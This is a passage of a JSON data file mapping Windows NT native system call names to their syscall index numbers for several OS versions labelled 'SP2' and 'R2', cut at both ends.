"NtDeviceIoControlFile": "4", "NtWriteFile": "5", "NtRemoveIoCompletion": "6", "NtReleaseSemaphore": "7", "NtReplyWaitReceivePort": "8", "NtReplyPort": "9", "NtSetInformationThread": "10", "NtSetEvent": "11", "NtClose": "12", "NtQueryObject": "13", "NtQueryInformationFile": "14", "NtOpenKey": "15", "NtEnumerateValueKey": "16", "NtFindAtom": "17", "NtQueryDefaultLocale": "18", "NtQueryKey": "19", "NtQueryValueKey": "20", "NtAllocateVirtualMemory": "21", "NtQueryInformationProcess": "22", "NtWaitForMultipleObjects32": "23", "NtWriteFileGather": "24", "NtSetInformationProcess": "25", "NtCreateKey": "26", "NtFreeVirtualMemory": "27", "NtImpersonateClientOfPort": "28", "NtReleaseMutant": "29", "NtQueryInformationToken": "30", "NtRequestWaitReplyPort": "31", "NtQueryVirtualMemory": "32", "NtOpenThreadToken": "33", "NtQueryInformationThread": "34", "NtOpenProcess": "35", "NtSetInformationFile": "36", "NtMapViewOfSection": "37", "NtAccessCheckAndAuditAlarm": "38", "NtUnmapViewOfSection": "39", "NtReplyWaitReceivePortEx": "40", "NtTerminateProcess": "41", "NtSetEventBoostPriority": "42", "NtReadFileScatter": "43", "NtOpenThreadTokenEx": "44", "NtOpenProcessTokenEx": "45", "NtQueryPerformanceCounter": "46", "NtEnumerateKey": "47", "NtOpenFile": "48", "NtDelayExecution": "49", "NtQueryDirectoryFile": "50", "NtQuerySystemInformation": "51", "NtOpenSection": "52", "NtQueryTimer": "53", "NtFsControlFile": "54", "NtWriteVirtualMemory": "55", "NtCloseObjectAuditAlarm": "56", "NtDuplicateObject": "57", "NtQueryAttributesFile": "58", "NtClearEvent": "59", "NtReadVirtualMemory": "60", "NtOpenEvent": "61", "NtAdjustPrivilegesToken": "62", "NtDuplicateToken": "63", "NtContinue": "64", "NtQueryDefaultUILanguage": "65", "NtQueueApcThread": "66", "NtYieldExecution": "67", "NtAddAtom": "68", "NtCreateEvent": "69", "NtQueryVolumeInformationFile": "70", "NtCreateSection": "71", "NtFlushBuffersFile": "72", "NtApphelpCacheControl": "73", "NtCreateProcessEx": "74", "NtCreateThread": "75", "NtIsProcessInJob": "76", "NtProtectVirtualMemory": "77", "NtQuerySection": "78", "NtResumeThread": "79", "NtTerminateThread": "80", "NtReadRequestData": "81", "NtCreateFile": "82", "NtQueryEvent": "83", "NtWriteRequestData": "84", "NtOpenDirectoryObject": "85", "NtAccessCheckByTypeAndAuditAlarm": "86", "NtQuerySystemTime": "87", "NtWaitForMultipleObjects": "88", "NtSetInformationObject": "89", "NtCancelIoFile": "90", "NtTraceEvent": "91", "NtPowerInformation": "92", "NtSetValueKey": "93", "NtCancelTimer": "94", "NtSetTimer": "95", "NtAcceptConnectPort": "96", "NtAccessCheck": "97", "NtAccessCheckByType": "98", "NtAccessCheckByTypeResultList": "99", "NtAccessCheckByTypeResultListAndAuditAlarm": "100", "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": "101", "NtAcquireCMFViewOwnership": "102", "NtAddBootEntry": "103", "NtAddDriverEntry": "104", "NtAdjustGroupsToken": "105", "NtAlertResumeThread": "106", "NtAlertThread": "107", "NtAllocateLocallyUniqueId": "108", "NtAllocateUserPhysicalPages": "109", "NtAllocateUuids": "110", "NtAlpcAcceptConnectPort": "111", "NtAlpcCancelMessage": "112", "NtAlpcConnectPort": "113", "NtAlpcCreatePort": "114", "NtAlpcCreatePortSection": "115", "NtAlpcCreateResourceReserve": "116", "NtAlpcCreateSectionView": "117", "NtAlpcCreateSecurityContext": "118", "NtAlpcDeletePortSection": "119", "NtAlpcDeleteResourceReserve": "120", "NtAlpcDeleteSectionView": "121", "NtAlpcDeleteSecurityContext": "122", "NtAlpcDisconnectPort": "123", "NtAlpcImpersonateClientOfPort": "124", "NtAlpcOpenSenderProcess": "125", "NtAlpcOpenSenderThread": "126", "NtAlpcQueryInformation": "127", "NtAlpcQueryInformationMessage": "128", "NtAlpcRevokeSecurityContext": "129", "NtAlpcSendWaitReceivePort": "130", "NtAlpcSetInformation": "131", "NtAreMappedFilesTheSame": "132", "NtAssignProcessToJobObject": "133", "NtRequestDeviceWakeup": "134", "NtCancelIoFileEx": "135", "NtCancelSynchronousIoFile": "136", "NtCommitComplete": "137", "NtCommitEnlistment": "138", "NtCommitTransaction": "139", "NtCompactKeys": "140", "NtCompareTokens": "141", "NtCompleteConnectPort": "142", "NtCompressKey": "143", "NtConnectPort": "144", "NtCreateDebugObject": "145", "NtCreateDirectoryObject": "146", "NtCreateEnlistment": "147", "NtCreateEventPair": "148", "NtCreateIoCompletion": "149", "NtCreateJobObject": "150", "NtCreateJobSet": "151", "NtCreateKeyTransacted": "152", "NtCreateKeyedEvent": "153", "NtCreateMailslotFile": "154", "NtCreateMutant": "155", "NtCreateNamedPipeFile": "156", "NtCreatePagingFile": "157", "NtCreatePort": "158", "NtCreatePrivateNamespace": "159", "NtCreateProcess": "160", "NtCreateProfile": "161", "NtCreateResourceManager": "162", "NtCreateSemaphore": "163", "NtCreateSymbolicLinkObject": "164", "NtCreateThreadEx": "165", "NtCreateTimer": "166", "NtCreateToken": "167", "NtCreateTransaction": "168", "NtCreateTransactionManager": "169", "NtCreateUserProcess": "170", "NtCreateWaitablePort": "171", "NtCreateWorkerFactory": "172", "NtDebugActiveProcess": "173", "NtDebugContinue": "174", "NtDeleteAtom": "175", "NtDeleteBootEntry": "176", "NtDeleteDriverEntry": "177", "NtDeleteFile": "178", "NtDeleteKey": "179", "NtDeleteObjectAuditAlarm": "180", "NtDeletePrivateNamespace": "181", "NtDeleteValueKey": "182", "NtDisplayString": "183", "NtEnumerateBootEntries": "184", "NtEnumerateDriverEntries": "185", "NtEnumerateSystemEnvironmentValuesEx": "186", "NtEnumerateTransactionObject": "187", "NtExtendSection": "188", "NtFilterToken": "189", "NtFlushInstallUILanguage": "190", "NtFlushInstructionCache": "191", "NtFlushKey": "192", "NtFlushProcessWriteBuffers": "193", "NtFlushVirtualMemory": "194", "NtFlushWriteBuffer": "195", "NtFreeUserPhysicalPages": "196", "NtFreezeRegistry": "197", "NtFreezeTransactions": "198", "NtGetContextThread": "199", "NtGetCurrentProcessorNumber": "200", "NtGetDevicePowerState": "201", "NtGetMUIRegistryInfo": "202", "NtGetNextProcess": "203", "NtGetNextThread": "204", "NtGetNlsSectionPtr": "205", "NtGetNotificationResourceManager": "206", "NtGetPlugPlayEvent": "207", "NtGetWriteWatch": "208", "NtImpersonateAnonymousToken": "209", "NtImpersonateThread": "210", "NtInitializeNlsFiles": "211", "NtInitializeRegistry": "212", "NtInitiatePowerAction": "213", "NtIsSystemResumeAutomatic": "214", "NtIsUILanguageComitted": "215", "NtListenPort": "216", "NtLoadDriver": "217", "NtLoadKey": "218", "NtLoadKey2": "219", "NtLoadKeyEx": "220", "NtLockFile": "221", "NtLockProductActivationKeys": "222", "NtLockRegistryKey": "223", "NtLockVirtualMemory": "224", "NtMakePermanentObject": "225", "NtMakeTemporaryObject": "226", "NtMapCMFModule": "227", "NtMapUserPhysicalPages": "228", "NtModifyBootEntry": "229", "NtModifyDriverEntry": "230", "NtNotifyChangeDirectoryFile": "231", "NtNotifyChangeKey": "232", "NtNotifyChangeMultipleKeys": "233", "NtOpenEnlistment": "234", "NtOpenEventPair": "235", "NtOpenIoCompletion": "236", "NtOpenJobObject": "237", "NtOpenKeyTransacted": "238", "NtOpenKeyedEvent": "239", "NtOpenMutant": "240", "NtOpenObjectAuditAlarm": "241", "NtOpenPrivateNamespace": "242", "NtOpenProcessToken": "243", "NtOpenResourceManager": "244", "NtOpenSemaphore": "245", "NtOpenSession": "246", "NtOpenSymbolicLinkObject": "247", "NtOpenThread": "248", "NtOpenTimer": "249", "NtOpenTransaction": "250", "NtOpenTransactionManager": "251", "NtPlugPlayControl": "252", "NtPrePrepareComplete": "253", "NtPrePrepareEnlistment": "254", "NtPrepareComplete": "255", "NtPrepareEnlistment": "256", "NtPrivilegeCheck": "257", "NtPrivilegeObjectAuditAlarm": "258", "NtPrivilegedServiceAuditAlarm": "259", "NtPropagationComplete": "260", "NtPropagationFailed": "261", "NtPulseEvent": "262", "NtQueryBootEntryOrder": "263", "NtQueryBootOptions": "264", "NtQueryDebugFilterState": "265", "NtQueryDirectoryObject": "266", "NtQueryDriverEntryOrder": "267", "NtQueryEaFile": "268", "NtQueryFullAttributesFile": "269", "NtQueryInformationAtom": "270", "NtQueryInformationEnlistment": "271", "NtQueryInformationJobObject": "272", "NtQueryInformationPort": "273", "NtQueryInformationResourceManager": "274", "NtQueryInformationTransaction": "275", "NtQueryInformationTransactionManager": "276", "NtQueryInformationWorkerFactory": "277", "NtQueryInstallUILanguage": "278", "NtQueryIntervalProfile": "279", "NtQueryIoCompletion": "280", "NtQueryLicenseValue": "281", "NtQueryMultipleValueKey": "282", "NtQueryMutant": "283", "NtQueryOpenSubKeys": "284", "NtQueryOpenSubKeysEx": "285", "NtQueryPortInformationProcess": "286", "NtQueryQuotaInformationFile": "287", "NtQuerySecurityObject": "288", "NtQuerySemaphore": "289", "NtQuerySymbolicLinkObject": "290", "NtQuerySystemEnvironmentValue": "291", "NtQuerySystemEnvironmentValueEx": "292", "NtQueryTimerResolution": "293", "NtRaiseException": "294", "NtRaiseHardError": "295", "NtReadOnlyEnlistment": "296", "NtRecoverEnlistment": "297", "NtRecoverResourceManager": "298", "NtRecoverTransactionManager": "299", "NtRegisterProtocolAddressInformation": "300", "NtRegisterThreadTerminatePort": "301", "NtReleaseCMFViewOwnership": "302", "NtReleaseKeyedEvent": "303", "NtReleaseWorkerFactoryWorker": "304", "NtRemoveIoCompletionEx": "305", "NtRemoveProcessDebug": "306", "NtRenameKey": "307", "NtRenameTransactionManager": "308", "NtReplaceKey": "309", "NtReplacePartitionUnit": "310", "NtReplyWaitReplyPort": "311", "NtCancelDeviceWakeupRequest": "312", "NtRequestPort": "313", "NtRequestWakeupLatency": "314", "NtResetEvent": "315", "NtResetWriteWatch": "316", "NtRestoreKey": "317", "NtResumeProcess": "318", "NtRollbackComplete": "319", "NtRollbackEnlistment": "320", "NtRollbackTransaction": "321", "NtRollforwardTransactionManager": "322", "NtSaveKey": "323", "NtSaveKeyEx": "324", "NtSaveMergedKeys": "325", "NtSecureConnectPort": "326", "NtSetBootEntryOrder": "327", "NtSetBootOptions": "328", "NtSetContextThread": "329", "NtSetDebugFilterState": "330", "NtSetDefaultHardErrorPort": "331", "NtSetDefaultLocale": "332", "NtSetDefaultUILanguage": "333", "NtSetDriverEntryOrder": "334", "NtSetEaFile": "335", "NtSetHighEventPair": "336", "NtSetHighWaitLowEventPair": "337", "NtSetInformationDebugObject": "338", "NtSetInformationEnlistment": "339", "NtSetInformationJobObject": "340", "NtSetInformationKey": "341", "NtSetInformationResourceManager": "342", "NtSetInformationToken": "343", "NtSetInformationTransaction": "344", "NtSetInformationTransactionManager": "345", "NtSetInformationWorkerFactory": "346", "NtSetIntervalProfile": "347", "NtSetIoCompletion": "348", "NtSetLdtEntries": "349", "NtSetLowEventPair": "350", "NtSetLowWaitHighEventPair": "351", "NtSetQuotaInformationFile": "352", "NtSetSecurityObject": "353", "NtSetSystemEnvironmentValue": "354", "NtSetSystemEnvironmentValueEx": "355", "NtSetSystemInformation": "356", "NtSetSystemPowerState": "357", "NtSetSystemTime": "358", "NtSetThreadExecutionState": "359", "NtSetTimerResolution": "360", "NtSetUuidSeed": "361", "NtSetVolumeInformationFile": "362", "NtShutdownSystem": "363", "NtShutdownWorkerFactory": "364", "NtSignalAndWaitForSingleObject": "365", "NtSinglePhaseReject": "366", "NtStartProfile": "367", "NtStopProfile": "368", "NtSuspendProcess": "369", "NtSuspendThread": "370", "NtSystemDebugControl": "371", "NtTerminateJobObject": "372", "NtTestAlert": "373", "NtThawRegistry": "374", "NtThawTransactions": "375", "NtTraceControl": "376", "NtTranslateFilePath": "377", "NtUnloadDriver": "378", "NtUnloadKey": "379", "NtUnloadKey2": "380", "NtUnloadKeyEx": "381", "NtUnlockFile": "382", "NtUnlockVirtualMemory": "383", "NtVdmControl": "384", "NtWaitForDebugEvent": "385", "NtWaitForKeyedEvent": "386", "NtWaitForWorkViaWorkerFactory": "387", "NtWaitHighEventPair": "388", "NtWaitLowEventPair": "389", "NtWorkerFactoryWorkerReady": "390"}, "SP2": {"NtMapUserPhysicalPagesScatter": "0", "NtWaitForSingleObject": "1", "NtCallbackReturn": "2", "NtReadFile": "3", "NtDeviceIoControlFile": "4", "NtWriteFile": "5", "NtRemoveIoCompletion": "6", "NtReleaseSemaphore": "7", "NtReplyWaitReceivePort": "8", "NtReplyPort": "9", "NtSetInformationThread": "10", "NtSetEvent": "11", "NtClose": "12", "NtQueryObject": "13", "NtQueryInformationFile": "14", "NtOpenKey": "15", "NtEnumerateValueKey": "16", "NtFindAtom": "17", "NtQueryDefaultLocale": "18", "NtQueryKey": "19", "NtQueryValueKey": "20", "NtAllocateVirtualMemory": "21", "NtQueryInformationProcess": "22", "NtWaitForMultipleObjects32": "23", "NtWriteFileGather": "24", "NtSetInformationProcess": "25", "NtCreateKey": "26", "NtFreeVirtualMemory": "27", "NtImpersonateClientOfPort": "28", "NtReleaseMutant": "29", "NtQueryInformationToken": "30", "NtRequestWaitReplyPort": "31", "NtQueryVirtualMemory": "32", "NtOpenThreadToken": "33", "NtQueryInformationThread": "34", "NtOpenProcess": "35", "NtSetInformationFile": "36", "NtMapViewOfSection": "37", "NtAccessCheckAndAuditAlarm": "38", "NtUnmapViewOfSection": "39", "NtReplyWaitReceivePortEx": "40", "NtTerminateProcess": "41", "NtSetEventBoostPriority": "42", "NtReadFileScatter": "43", "NtOpenThreadTokenEx": "44", "NtOpenProcessTokenEx": "45", "NtQueryPerformanceCounter": "46", "NtEnumerateKey": "47", "NtOpenFile": "48", "NtDelayExecution": "49", "NtQueryDirectoryFile": "50", "NtQuerySystemInformation": "51", "NtOpenSection": "52", "NtQueryTimer": "53", "NtFsControlFile": "54", "NtWriteVirtualMemory": "55", "NtCloseObjectAuditAlarm": "56", "NtDuplicateObject": "57", "NtQueryAttributesFile": "58", "NtClearEvent": "59", "NtReadVirtualMemory": "60", "NtOpenEvent": "61", "NtAdjustPrivilegesToken": "62", "NtDuplicateToken": "63", "NtContinue": "64", "NtQueryDefaultUILanguage": "65", "NtQueueApcThread": "66", "NtYieldExecution": "67", "NtAddAtom": "68", "NtCreateEvent": "69", "NtQueryVolumeInformationFile": "70", "NtCreateSection": "71", "NtFlushBuffersFile": "72", "NtApphelpCacheControl": "73", "NtCreateProcessEx": "74", "NtCreateThread": "75", "NtIsProcessInJob": "76", "NtProtectVirtualMemory": "77", "NtQuerySection": "78", "NtResumeThread": "79", "NtTerminateThread": "80", "NtReadRequestData": "81", "NtCreateFile": "82", "NtQueryEvent": "83", "NtWriteRequestData": "84", "NtOpenDirectoryObject": "85", "NtAccessCheckByTypeAndAuditAlarm": "86", "NtQuerySystemTime": "87", "NtWaitForMultipleObjects": "88", "NtSetInformationObject": "89", "NtCancelIoFile": "90", "NtTraceEvent": "91", "NtPowerInformation": "92", "NtSetValueKey": "93", "NtCancelTimer": "94", "NtSetTimer": "95", "NtAcceptConnectPort": "96", "NtAccessCheck": "97", "NtAccessCheckByType": "98", "NtAccessCheckByTypeResultList": "99", "NtAccessCheckByTypeResultListAndAuditAlarm": "100", "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": "101", "NtAcquireCMFViewOwnership": "102", "NtAddBootEntry": "103", "NtAddDriverEntry": "104", "NtAdjustGroupsToken": "105", "NtAlertResumeThread": "106", "NtAlertThread": "107", "NtAllocateLocallyUniqueId": "108", "NtAllocateUserPhysicalPages": "109", "NtAllocateUuids": "110", "NtAlpcAcceptConnectPort": "111", "NtAlpcCancelMessage": "112", "NtAlpcConnectPort": "113", "NtAlpcCreatePort": "114", "NtAlpcCreatePortSection": "115", "NtAlpcCreateResourceReserve": "116", "NtAlpcCreateSectionView": "117", "NtAlpcCreateSecurityContext": "118", "NtAlpcDeletePortSection": "119", "NtAlpcDeleteResourceReserve": "120", "NtAlpcDeleteSectionView": "121", "NtAlpcDeleteSecurityContext": "122", "NtAlpcDisconnectPort": "123", "NtAlpcImpersonateClientOfPort": "124", "NtAlpcOpenSenderProcess": "125", "NtAlpcOpenSenderThread": "126", "NtAlpcQueryInformation": "127", "NtAlpcQueryInformationMessage": "128", "NtAlpcRevokeSecurityContext": "129", "NtAlpcSendWaitReceivePort": "130", "NtAlpcSetInformation": "131", "NtAreMappedFilesTheSame": "132", "NtAssignProcessToJobObject": "133", "NtCancelDeviceWakeupRequest": "134", "NtCancelIoFileEx": "135", "NtCancelSynchronousIoFile": "136", "NtCommitComplete": "137", "NtCommitEnlistment": "138", "NtCommitTransaction": "139", "NtCompactKeys": "140", "NtCompareTokens": "141", "NtCompleteConnectPort": "142", "NtCompressKey": "143", "NtConnectPort": "144", "NtCreateDebugObject": "145", "NtCreateDirectoryObject": "146", "NtCreateEnlistment": "147", "NtCreateEventPair": "148", "NtCreateIoCompletion": "149", "NtCreateJobObject": "150", "NtCreateJobSet": "151", "NtCreateKeyTransacted": "152", "NtCreateKeyedEvent": "153", "NtCreateMailslotFile": "154", "NtCreateMutant": "155", "NtCreateNamedPipeFile": "156", "NtCreatePagingFile": "157", "NtCreatePort": "158", "NtCreatePrivateNamespace": "159", "NtCreateProcess": "160", "NtCreateProfile": "161", "NtCreateResourceManager": "162", "NtCreateSemaphore": "163", "NtCreateSymbolicLinkObject": "164", "NtCreateThreadEx": "165", "NtCreateTimer": "166", "NtCreateToken": "167", "NtCreateTransaction": "168", "NtCreateTransactionManager": "169", "NtCreateUserProcess": "170", "NtCreateWaitablePort": "171", "NtCreateWorkerFactory": "172", "NtDebugActiveProcess": "173", "NtDebugContinue": "174", "NtDeleteAtom": "175", "NtDeleteBootEntry": "176", "NtDeleteDriverEntry": "177", "NtDeleteFile": "178", "NtDeleteKey": "179", "NtDeleteObjectAuditAlarm": "180", "NtDeletePrivateNamespace": "181", "NtDeleteValueKey": "182", "NtDisplayString": "183", "NtEnumerateBootEntries": "184", "NtEnumerateDriverEntries": "185", "NtEnumerateSystemEnvironmentValuesEx": "186", "NtEnumerateTransactionObject": "187", "NtExtendSection": "188", "NtFilterToken": "189", "NtFlushInstallUILanguage": "190", "NtFlushInstructionCache": "191", "NtFlushKey": "192", "NtFlushProcessWriteBuffers": "193", "NtFlushVirtualMemory": "194", "NtFlushWriteBuffer": "195", "NtFreeUserPhysicalPages": "196", "NtFreezeRegistry": "197", "NtFreezeTransactions": "198", "NtGetContextThread": "199", "NtGetCurrentProcessorNumber": "200", "NtGetDevicePowerState": "201", "NtGetMUIRegistryInfo": "202", "NtGetNextProcess": "203", "NtGetNextThread": "204", "NtGetNlsSectionPtr": "205", "NtGetNotificationResourceManager": "206", "NtGetPlugPlayEvent": "207", "NtGetWriteWatch": "208", "NtImpersonateAnonymousToken": "209", "NtImpersonateThread": "210", "NtInitializeNlsFiles": "211", "NtInitializeRegistry": "212", "NtInitiatePowerAction": "213", "NtIsSystemResumeAutomatic": "214", "NtIsUILanguageComitted": "215", "NtListenPort": "216", "NtLoadDriver": "217", "NtLoadKey": "218", "NtLoadKey2": "219", "NtLoadKeyEx": "220", "NtLockFile": "221", "NtLockProductActivationKeys": "222", "NtLockRegistryKey": "223", "NtLockVirtualMemory": "224", "NtMakePermanentObject": "225", "NtMakeTemporaryObject": "226", "NtMapCMFModule": "227", "NtMapUserPhysicalPages": "228", "NtModifyBootEntry": "229", "NtModifyDriverEntry": "230", "NtNotifyChangeDirectoryFile": "231", "NtNotifyChangeKey": "232", "NtNotifyChangeMultipleKeys": "233", "NtOpenEnlistment": "234", "NtOpenEventPair": "235", "NtOpenIoCompletion": "236", "NtOpenJobObject": "237", "NtOpenKeyTransacted": "238", "NtOpenKeyedEvent": "239", "NtOpenMutant": "240", "NtOpenObjectAuditAlarm": "241", "NtOpenPrivateNamespace": "242", "NtOpenProcessToken": "243", "NtOpenResourceManager": "244", "NtOpenSemaphore": "245", "NtOpenSession": "246", "NtOpenSymbolicLinkObject": "247", "NtOpenThread": "248", "NtOpenTimer": "249", "NtOpenTransaction": "250", "NtOpenTransactionManager": "251", "NtPlugPlayControl": "252", "NtPrePrepareComplete": "253", "NtPrePrepareEnlistment": "254", "NtPrepareComplete": "255", "NtPrepareEnlistment": "256", "NtPrivilegeCheck": "257", "NtPrivilegeObjectAuditAlarm": "258", "NtPrivilegedServiceAuditAlarm": "259", "NtPropagationComplete": "260", "NtPropagationFailed": "261", "NtPulseEvent": "262", "NtQueryBootEntryOrder": "263", "NtQueryBootOptions": "264", "NtQueryDebugFilterState": "265", "NtQueryDirectoryObject": "266", "NtQueryDriverEntryOrder": "267", "NtQueryEaFile": "268", "NtQueryFullAttributesFile": "269", "NtQueryInformationAtom": "270", "NtQueryInformationEnlistment": "271", "NtQueryInformationJobObject": "272", "NtQueryInformationPort": "273", "NtQueryInformationResourceManager": "274", "NtQueryInformationTransaction": "275", "NtQueryInformationTransactionManager": "276", "NtQueryInformationWorkerFactory": "277", "NtQueryInstallUILanguage": "278", "NtQueryIntervalProfile": "279", "NtQueryIoCompletion": "280", "NtQueryLicenseValue": "281", "NtQueryMultipleValueKey": "282", "NtQueryMutant": "283", "NtQueryOpenSubKeys": "284", "NtQueryOpenSubKeysEx": "285", "NtQueryPortInformationProcess": "286", "NtQueryQuotaInformationFile": "287", "NtQuerySecurityObject": "288", "NtQuerySemaphore": "289", "NtQuerySymbolicLinkObject": "290", "NtQuerySystemEnvironmentValue": "291", "NtQuerySystemEnvironmentValueEx": "292", "NtQueryTimerResolution": "293", "NtRaiseException": "294", "NtRaiseHardError": "295", "NtReadOnlyEnlistment": "296", "NtRecoverEnlistment": "297", "NtRecoverResourceManager": "298", "NtRecoverTransactionManager": "299", "NtRegisterProtocolAddressInformation": "300", "NtRegisterThreadTerminatePort": "301", "NtReleaseCMFViewOwnership": "302", "NtReleaseKeyedEvent": "303", "NtReleaseWorkerFactoryWorker": "304", "NtRemoveIoCompletionEx": "305", "NtRemoveProcessDebug": "306", "NtRenameKey": "307", "NtRenameTransactionManager": "308", "NtReplaceKey": "309", "NtReplacePartitionUnit": "310", "NtReplyWaitReplyPort": "311", "NtRequestDeviceWakeup": "312", "NtRequestPort": "313", "NtRequestWakeupLatency": "314", "NtResetEvent": "315", "NtResetWriteWatch": "316", "NtRestoreKey": "317", "NtResumeProcess": "318", "NtRollbackComplete": "319", "NtRollbackEnlistment": "320", "NtRollbackTransaction": "321", "NtRollforwardTransactionManager": "322", "NtSaveKey": "323", "NtSaveKeyEx": "324", "NtSaveMergedKeys": "325", "NtSecureConnectPort": "326", "NtSetBootEntryOrder": "327", "NtSetBootOptions": "328", "NtSetContextThread": "329", "NtSetDebugFilterState": "330", "NtSetDefaultHardErrorPort": "331", "NtSetDefaultLocale": "332", "NtSetDefaultUILanguage": "333", "NtSetDriverEntryOrder": "334", "NtSetEaFile": "335", "NtSetHighEventPair": "336", "NtSetHighWaitLowEventPair": "337", "NtSetInformationDebugObject": "338", "NtSetInformationEnlistment": "339", "NtSetInformationJobObject": "340", "NtSetInformationKey": "341", "NtSetInformationResourceManager": "342", "NtSetInformationToken": "343", "NtSetInformationTransaction": "344", "NtSetInformationTransactionManager": "345", "NtSetInformationWorkerFactory": "346", "NtSetIntervalProfile": "347", "NtSetIoCompletion": "348", "NtSetLdtEntries": "349", "NtSetLowEventPair": "350", "NtSetLowWaitHighEventPair": "351", "NtSetQuotaInformationFile": "352", "NtSetSecurityObject": "353", "NtSetSystemEnvironmentValue": "354", "NtSetSystemEnvironmentValueEx": "355", "NtSetSystemInformation": "356", "NtSetSystemPowerState": "357", "NtSetSystemTime": "358", "NtSetThreadExecutionState": "359", "NtSetTimerResolution": "360", "NtSetUuidSeed": "361", "NtSetVolumeInformationFile": "362", "NtShutdownSystem": "363", "NtShutdownWorkerFactory": "364", "NtSignalAndWaitForSingleObject": "365", "NtSinglePhaseReject": "366", "NtStartProfile": "367", "NtStopProfile": "368", "NtSuspendProcess": "369", "NtSuspendThread": "370", "NtSystemDebugControl": "371", "NtTerminateJobObject": "372", "NtTestAlert": "373", "NtThawRegistry": "374", "NtThawTransactions": "375", "NtTraceControl": "376", "NtTranslateFilePath": "377", "NtUnloadDriver": "378", "NtUnloadKey": "379", "NtUnloadKey2": "380", "NtUnloadKeyEx": "381", "NtUnlockFile": "382", "NtUnlockVirtualMemory": "383", "NtVdmControl": "384", "NtWaitForDebugEvent": "385", "NtWaitForKeyedEvent": "386", "NtWaitForWorkViaWorkerFactory": "387", "NtWaitHighEventPair": "388", "NtWaitLowEventPair": "389", "NtWorkerFactoryWorkerReady": "390"}, "R2": {"NtMapUserPhysicalPagesScatter": "0", "NtWaitForSingleObject": "1", "NtCallbackReturn": "2", "NtReadFile": "3", "NtDeviceIoControlFile": "4", "NtWriteFile": "5", "NtRemoveIoCompletion": "6", "NtReleaseSemaphore": "7", "NtReplyWaitReceivePort": "8", "NtReplyPort": "9", "NtSetInformationThread": "10", "NtSetEvent": "11", "NtClose": "12", "NtQueryObject": "13", "NtQueryInformationFile": "14", "NtOpenKey": "15", "NtEnumerateValueKey": "16", "NtFindAtom": "17", "NtQueryDefaultLocale": "18", "NtQueryKey": "19", "NtQueryValueKey": "20", "NtAllocateVirtualMemory": "21", "NtQueryInformationProcess": "22", "NtWaitForMultipleObjects32": "23", "NtWriteFileGather": "24", "NtSetInformationProcess": "25", "NtCreateKey": "26", "NtFreeVirtualMemory": "27", "NtImpersonateClientOfPort": "28", "NtReleaseMutant": "29", "NtQueryInformationToken": "30", "NtRequestWaitReplyPort": "31", "NtQueryVirtualMemory": "32", "NtOpenThreadToken": "33", "NtQueryInformationThread": "34", "NtOpenProcess": "35", "NtSetInformationFile": "36", "NtMapViewOfSection": "37", "NtAccessCheckAndAuditAlarm": "38", "NtUnmapViewOfSection": "39", "NtReplyWaitReceivePortEx": "40", "NtTerminateProcess": "41", "NtSetEventBoostPriority": "42", "NtReadFileScatter": "43", "NtOpenThreadTokenEx": "44", "NtOpenProcessTokenEx": "45", "NtQueryPerformanceCounter": "46", "NtEnumerateKey": "47", "NtOpenFile": "48", "NtDelayExecution": "49", "NtQueryDirectoryFile": "50", "NtQuerySystemInformation": "51", "NtOpenSection": "52", "NtQueryTimer": "53", "NtFsControlFile": "54", "NtWriteVirtualMemory": "55", "NtCloseObjectAuditAlarm": "56", "NtDuplicateObject": "57", "NtQueryAttributesFile": "58", "NtClearEvent": "59", "NtReadVirtualMemory": "60", "NtOpenEvent": "61", "NtAdjustPrivilegesToken": "62", "NtDuplicateToken": "63", "NtContinue": "64", "NtQueryDefaultUILanguage": "65", "NtQueueApcThread": "66", "NtYieldExecution": "67", "NtAddAtom": "68", "NtCreateEvent": "69", "NtQueryVolumeInformationFile": "70", "NtCreateSection": "71", "NtFlushBuffersFile": "72", "NtApphelpCacheControl": "73", "NtCreateProcessEx": "74", "NtCreateThread": "75", "NtIsProcessInJob": "76", "NtProtectVirtualMemory": "77", "NtQuerySection": "78", "NtResumeThread": "79", "NtTerminateThread": "80", "NtReadRequestData": "81", "NtCreateFile": "82", "NtQueryEvent": "83", "NtWriteRequestData": "84", "NtOpenDirectoryObject": "85", "NtAccessCheckByTypeAndAuditAlarm": "86", "NtQuerySystemTime": "87", "NtWaitForMultipleObjects": "88", "NtSetInformationObject": "89", "NtCancelIoFile": "90", "NtTraceEvent": "91", "NtPowerInformation": "92", "NtSetValueKey": "93", "NtCancelTimer": "94", "NtSetTimer": "95", "NtAcceptConnectPort": "96", "NtAccessCheck": "97", "NtAccessCheckByType": "98", "NtAccessCheckByTypeResultList": "99", "NtAccessCheckByTypeResultListAndAuditAlarm": "100", "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": "101", "NtAddBootEntry": "102", "NtAddDriverEntry": "103", "NtAdjustGroupsToken": "104", "NtAlertResumeThread": "105", "NtAlertThread": "106", "NtAllocateLocallyUniqueId": "107", "NtAllocateReserveObject": "108", "NtAllocateUserPhysicalPages": "109", "NtAllocateUuids": "110", "NtAlpcAcceptConnectPort": "111", "NtAlpcCancelMessage": "112", "NtAlpcConnectPort": "113", "NtAlpcCreatePort": "114", "NtAlpcCreatePortSection": "115", "NtAlpcCreateResourceReserve": "116", "NtAlpcCreateSectionView": "117", "NtAlpcCreateSecurityContext": "118", "NtAlpcDeletePortSection": "119", "NtAlpcDeleteResourceReserve": "120", "NtAlpcDeleteSectionView": "121", "NtAlpcDeleteSecurityContext": "122", "NtAlpcDisconnectPort": "123", "NtAlpcImpersonateClientOfPort": "124", "NtAlpcOpenSenderProcess": "125", "NtAlpcOpenSenderThread": "126", "NtAlpcQueryInformation": "127", "NtAlpcQueryInformationMessage": "128", "NtAlpcRevokeSecurityContext": "129", "NtAlpcSendWaitReceivePort": "130", "NtAlpcSetInformation": "131", "NtAreMappedFilesTheSame": "132", "NtAssignProcessToJobObject": "133", "NtCancelIoFileEx": "134", "NtCancelSynchronousIoFile": "135", "NtCommitComplete": "136", "NtCommitEnlistment": "137", "NtCommitTransaction": "138", "NtCompactKeys": "139", "NtCompareTokens": "140", "NtCompleteConnectPort": "141", "NtCompressKey": "142", "NtConnectPort": "143", "NtCreateDebugObject": "144", "NtCreateDirectoryObject": "145", "NtCreateEnlistment": "146", "NtCreateEventPair": "147", "NtCreateIoCompletion": "148", "NtCreateJobObject": "149", "NtCreateJobSet": "150", "NtCreateKeyTransacted": "151", "NtCreateKeyedEvent": "152", "NtCreateMailslotFile": "153", "NtCreateMutant": "154", "NtCreateNamedPipeFile": "155", "NtCreatePagingFile": "156", "NtCreatePort": "157", "NtCreatePrivateNamespace": "158", "NtCreateProcess": "159", "NtCreateProfile": 